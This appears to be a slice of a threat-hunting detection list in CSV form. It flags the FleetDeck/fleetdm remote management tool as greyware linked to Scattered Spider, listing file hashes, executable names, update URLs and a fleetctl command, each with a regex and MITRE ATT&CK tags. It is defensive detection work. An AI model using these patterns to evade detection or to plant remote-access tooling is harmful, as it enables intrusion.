"*c678c9a61d0faf3f0e030010615c3cca395d815f8c073ea171b20d4bdf221192*",".{0,1000}c678c9a61d0faf3f0e030010615c3cca395d815f8c073ea171b20d4bdf221192.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*c7bdf687d8aff0ab4ddb28fa9c633f416ae82b201f3c51898136c9a26631a7f1*",".{0,1000}c7bdf687d8aff0ab4ddb28fa9c633f416ae82b201f3c51898136c9a26631a7f1.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*c8d5f96c3f1d9054427004f52d87d081f0bd05e4f104eaee857c10bab7400c2d*",".{0,1000}c8d5f96c3f1d9054427004f52d87d081f0bd05e4f104eaee857c10bab7400c2d.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*ce4fc109fa3b38b58035b1274318e8db4eac26aee424d0ae4fc8d4113146db52*",".{0,1000}ce4fc109fa3b38b58035b1274318e8db4eac26aee424d0ae4fc8d4113146db52.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*cf51ff263c4171a25b93703cad922ad1f4ca4a43eb93f4b4b6129a774acccefe*",".{0,1000}cf51ff263c4171a25b93703cad922ad1f4ca4a43eb93f4b4b6129a774acccefe.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*cfa2c04ccd3a209c5a01db6de5b393dc2f1f038add46d45e957490c990a47c62*",".{0,1000}cfa2c04ccd3a209c5a01db6de5b393dc2f1f038add46d45e957490c990a47c62.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*commanderupdate.fleetdeck.io*",".{0,1000}commanderupdate\.fleetdeck\.io.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","1","N/A","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*d12ea4fbcf04a2b0d848ed5b610b78055558e95b7cfd6461ee2e81ba4a7216b5*",".{0,1000}d12ea4fbcf04a2b0d848ed5b610b78055558e95b7cfd6461ee2e81ba4a7216b5.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*d1a23b9adddc0a6dc7806cb8fb9db94adc7263f2712f379dafe654ed38fc6bec*",".{0,1000}d1a23b9adddc0a6dc7806cb8fb9db94adc7263f2712f379dafe654ed38fc6bec.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*d3881b865311e774107ee50db4ee9a27cce669ccdd40e92c1990c4f1ec73e523*",".{0,1000}d3881b865311e774107ee50db4ee9a27cce669ccdd40e92c1990c4f1ec73e523.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*d44e3a415d99266b1759d1e452d3cf115ae01acb822bdff471f19f90c2cf7426*",".{0,1000}d44e3a415d99266b1759d1e452d3cf115ae01acb822bdff471f19f90c2cf7426.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*d7102b8487a285583c69c54bf0bb7a40148eee6050e45ced1d0380bf83ae7aaa*",".{0,1000}d7102b8487a285583c69c54bf0bb7a40148eee6050e45ced1d0380bf83ae7aaa.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*ddfb0598ad97db5738e82403d0e932d2df9591e7e2998f425b56360b75d56c71*",".{0,1000}ddfb0598ad97db5738e82403d0e932d2df9591e7e2998f425b56360b75d56c71.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*de04a4f93837236a62fcd753c4ae7f64ebdbd8880ee2faffd0b950dcc2bc744b*",".{0,1000}de04a4f93837236a62fcd753c4ae7f64ebdbd8880ee2faffd0b950dcc2bc744b.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*de4be9f031e2d9d10bcc70a409aaa0e5d311460828d2c6a5404deaa4f7da98ea*",".{0,1000}de4be9f031e2d9d10bcc70a409aaa0e5d311460828d2c6a5404deaa4f7da98ea.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*de7cab0e59a003edd943523dfefa1d038ee1edd914548625fa97324ce680516b*",".{0,1000}de7cab0e59a003edd943523dfefa1d038ee1edd914548625fa97324ce680516b.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*def26f6de141f3f90c975923f007cd0acf66422357d9dc78bbb2bdba3f7184a5*",".{0,1000}def26f6de141f3f90c975923f007cd0acf66422357d9dc78bbb2bdba3f7184a5.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*df1ecdc0031475f4481f32911d5222f265ca016bc23a2ce5febe24339f473c02*",".{0,1000}df1ecdc0031475f4481f32911d5222f265ca016bc23a2ce5febe24339f473c02.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*e010e0aa32e87164f562b23b09290e0cb1dd3a634beab90c015a7f6db2afc295*",".{0,1000}e010e0aa32e87164f562b23b09290e0cb1dd3a634beab90c015a7f6db2afc295.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*e11e21d85234c890f047955456c220a95dfcb6f010fadd20fcb9e15ea43a4cf7*",".{0,1000}e11e21d85234c890f047955456c220a95dfcb6f010fadd20fcb9e15ea43a4cf7.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*e3a9686198e872ef6984215ebcd18a3c2f57c8ca009dc3c23b485a88a92fff01*",".{0,1000}e3a9686198e872ef6984215ebcd18a3c2f57c8ca009dc3c23b485a88a92fff01.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*e4997313fa56907981be64b670a5609df81c55ebeecc8fd26a8d7471c4f62317*",".{0,1000}e4997313fa56907981be64b670a5609df81c55ebeecc8fd26a8d7471c4f62317.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*e54a67a249e4e87a3ee0ab2c0cd5edf58cd52eee67b5f2df4d15fad38c1880b3*",".{0,1000}e54a67a249e4e87a3ee0ab2c0cd5edf58cd52eee67b5f2df4d15fad38c1880b3.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*e626c24d81970be447e683730e22ff4fccfbc720b6b9dff41bbd2f2419766380*",".{0,1000}e626c24d81970be447e683730e22ff4fccfbc720b6b9dff41bbd2f2419766380.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*e73c16e92842b5e4889ca8e7b88901ddd5b59f85394e82ca8554c75d26250ebb*",".{0,1000}e73c16e92842b5e4889ca8e7b88901ddd5b59f85394e82ca8554c75d26250ebb.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*e7aed3b9cea264001849c7bb2bbd56a8772816c065663c6e954890a72be441b7*",".{0,1000}e7aed3b9cea264001849c7bb2bbd56a8772816c065663c6e954890a72be441b7.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*e84ef4bf8f7150620cdbb98da7f38f397eddc996b2b93dc7b00f8ae39a28635c*",".{0,1000}e84ef4bf8f7150620cdbb98da7f38f397eddc996b2b93dc7b00f8ae39a28635c.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*e99d21c07b1b29361d6eb4895c350a36651536eb1719d50c802d5067c4b723c9*",".{0,1000}e99d21c07b1b29361d6eb4895c350a36651536eb1719d50c802d5067c4b723c9.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*e9ca78d11b144352ca1d9ec83d7ec0f44fba238ae3ba46560ed01b45eaa1f232*",".{0,1000}e9ca78d11b144352ca1d9ec83d7ec0f44fba238ae3ba46560ed01b45eaa1f232.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*ebfdb029f616dcbd294b785874a77d5b62a08f92d562afb522309a07a36f472c*",".{0,1000}ebfdb029f616dcbd294b785874a77d5b62a08f92d562afb522309a07a36f472c.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*ed716e9d8a9382928e6a20bbac0f2245b7996125d9d86ace9c9a88fb9f8e4fde*",".{0,1000}ed716e9d8a9382928e6a20bbac0f2245b7996125d9d86ace9c9a88fb9f8e4fde.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*edb82e0716aa844b2d6d8ebfe4d4e08f41a0618fdd62b64623c8f590a39bc207*",".{0,1000}edb82e0716aa844b2d6d8ebfe4d4e08f41a0618fdd62b64623c8f590a39bc207.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*ee3e0370955bb5c44e5a5370bdd268e5e948e18dbe86ae89e9f243f4a1668850*",".{0,1000}ee3e0370955bb5c44e5a5370bdd268e5e948e18dbe86ae89e9f243f4a1668850.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*ee5974d52512f1d5e55fafef9e04969656c1dd2fa5919376f81bf62b1a6a04e9*",".{0,1000}ee5974d52512f1d5e55fafef9e04969656c1dd2fa5919376f81bf62b1a6a04e9.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*ef3cc05f5d86042c926a3243c081957445717960268743953793980df144b145*",".{0,1000}ef3cc05f5d86042c926a3243c081957445717960268743953793980df144b145.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*ef67236f50b717490ba2d02669aac749eab81b805285e5780cb691006f26f742*",".{0,1000}ef67236f50b717490ba2d02669aac749eab81b805285e5780cb691006f26f742.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*ef9ccb9743205b6cd63e965ded0ad5b6836d9c4f4d8b3bec5264bdfbf1c71651*",".{0,1000}ef9ccb9743205b6cd63e965ded0ad5b6836d9c4f4d8b3bec5264bdfbf1c71651.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*f004ede766d83d38ded3358bef66fd56b564fcea19cde01f79dee4a426916448*",".{0,1000}f004ede766d83d38ded3358bef66fd56b564fcea19cde01f79dee4a426916448.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*f0585309751d285f47ef51783422235b20248a430dc6daca9d13e4755fd02721*",".{0,1000}f0585309751d285f47ef51783422235b20248a430dc6daca9d13e4755fd02721.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*f193e6dd7595ee4163e6299c5196dcee429046f0f99175f5058ddce9348057bf*",".{0,1000}f193e6dd7595ee4163e6299c5196dcee429046f0f99175f5058ddce9348057bf.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*f263d762ee5788d2773d167ed15e6fc41e874f8682b6df9c8f8215c07c836275*",".{0,1000}f263d762ee5788d2773d167ed15e6fc41e874f8682b6df9c8f8215c07c836275.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*f3c40d7fc7a91a57e7689ada1c1b6b7167f4a740bb2124ea1c3a75d0bde8030b*",".{0,1000}f3c40d7fc7a91a57e7689ada1c1b6b7167f4a740bb2124ea1c3a75d0bde8030b.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*f3f3cc358d84f4adca20bf1ba7a0a08d733d54cfd6a62276b7b465a58902bf99*",".{0,1000}f3f3cc358d84f4adca20bf1ba7a0a08d733d54cfd6a62276b7b465a58902bf99.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*f44a9e93bc06742004f0b5c74b00cf0689b4890b903803c338ef80b9fd69c173*",".{0,1000}f44a9e93bc06742004f0b5c74b00cf0689b4890b903803c338ef80b9fd69c173.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*f4be7647922d6d458692d149c3aec12c3ecd84ed97761dd5478b1e10cbb94d7e*",".{0,1000}f4be7647922d6d458692d149c3aec12c3ecd84ed97761dd5478b1e10cbb94d7e.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*f6b2697a2c40fee8c1aeac7133b205797cf4d877500e96951199c06422a66e33*",".{0,1000}f6b2697a2c40fee8c1aeac7133b205797cf4d877500e96951199c06422a66e33.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*f7a9240b781a22fc573a4780da8dadaa761853d1247f21b9306083962e0197d0*",".{0,1000}f7a9240b781a22fc573a4780da8dadaa761853d1247f21b9306083962e0197d0.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*f99653446a9eb4dbc8bb2bcbef659f8fe2af69d5ad9319eaba68c394cb1c2b06*",".{0,1000}f99653446a9eb4dbc8bb2bcbef659f8fe2af69d5ad9319eaba68c394cb1c2b06.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*fa1883bb377e2154c9dc766235f92612b8187ce2121f5ba3c3da28f1ebe6de63*",".{0,1000}fa1883bb377e2154c9dc766235f92612b8187ce2121f5ba3c3da28f1ebe6de63.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*FAECC814-3F3F-4CA0-8C2B-72D5E4670B92*",".{0,1000}FAECC814\-3F3F\-4CA0\-8C2B\-72D5E4670B92.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#GUIDproject","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*fb998e66174bc1cee14dff001bec28d4a43ad753885a95f25015d71db8ff39fb*",".{0,1000}fb998e66174bc1cee14dff001bec28d4a43ad753885a95f25015d71db8ff39fb.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*fc9a33902b9f6efc6ade3bd7cff30f476d6e7fcfa68d57d063c3ec03f8ac2bf8*",".{0,1000}fc9a33902b9f6efc6ade3bd7cff30f476d6e7fcfa68d57d063c3ec03f8ac2bf8.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*fd075f9c84e91c2f7c0937e730df44f3e9fe9b74c41bdf62645a9798cd1a45c5*",".{0,1000}fd075f9c84e91c2f7c0937e730df44f3e9fe9b74c41bdf62645a9798cd1a45c5.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*fe4a85694ea1405552e8bd6fabbff0a676ff428a529fb72e23ca48ca0d2f9ba7*",".{0,1000}fe4a85694ea1405552e8bd6fabbff0a676ff428a529fb72e23ca48ca0d2f9ba7.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*ff91f0d3a6ffcf273c455b50cd84d306e03e1ec0b650175bee3dde1480d1d113*",".{0,1000}ff91f0d3a6ffcf273c455b50cd84d306e03e1ec0b650175bee3dde1480d1d113.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*fleetctl updates init*",".{0,1000}fleetctl\supdates\sinit.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","N/A","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*fleetdeck.io/prototype3/commander_svc*",".{0,1000}fleetdeck\.io\/prototype3\/commander_svc.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","1","N/A","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*fleetdeck_agent.exe*",".{0,1000}fleetdeck_agent\.exe.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","1","N/A","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*fleetdeck_agent_svc.exe*",".{0,1000}fleetdeck_agent_svc\.exe.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","1","N/A","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*fleetdeck_commander_launcher.exe*",".{0,1000}fleetdeck_commander_launcher\.exe.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","1","N/A","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*fleetdeck_commander_svc.exe*",".{0,1000}fleetdeck_commander_svc\.exe.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","1","N/A","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*fleetdeck_installer.exe*",".{0,1000}fleetdeck_installer\.exe.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","1","N/A","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
